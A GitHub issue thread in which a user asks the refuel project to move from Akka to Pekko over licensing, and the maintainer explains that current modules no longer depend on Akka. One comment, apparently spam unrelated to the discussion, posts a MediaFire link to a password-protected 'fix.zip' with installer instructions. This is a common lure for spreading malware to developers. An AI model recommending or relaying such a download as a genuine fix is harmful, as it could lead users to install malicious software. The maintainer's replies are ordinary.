### ISSUE TITLE
Change Akka to Pekko

### ISSUE THREAD

**Issue by truongcpqn2421998** [giiita/refuel#95]
Currently, Akka is licensed under the Business Source License. So, I want to you change from Akka to Pekko for Free License
Please update this as soon as possible. 
Thank you so much

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by giiita** [comment]
@truongcpqn2421998
Thank you for your suggestion. Currently, none of the modules in the refuel2 series depend on Akka. Could you please confirm if you are using `refuel-http` or `refuel-auth-provider`? If you are using `refuel-http`, I recommend switching to `pekko-http`, as there are no immediate plans for further development of `refuel-http`. If you are using `refuel-auth-provider`, we will consider making the necessary updates.

Thank you once again

**Comment by truongcpqn2421998** [comment]
@giiita 
Thank you for your answer 🙇‍♂️
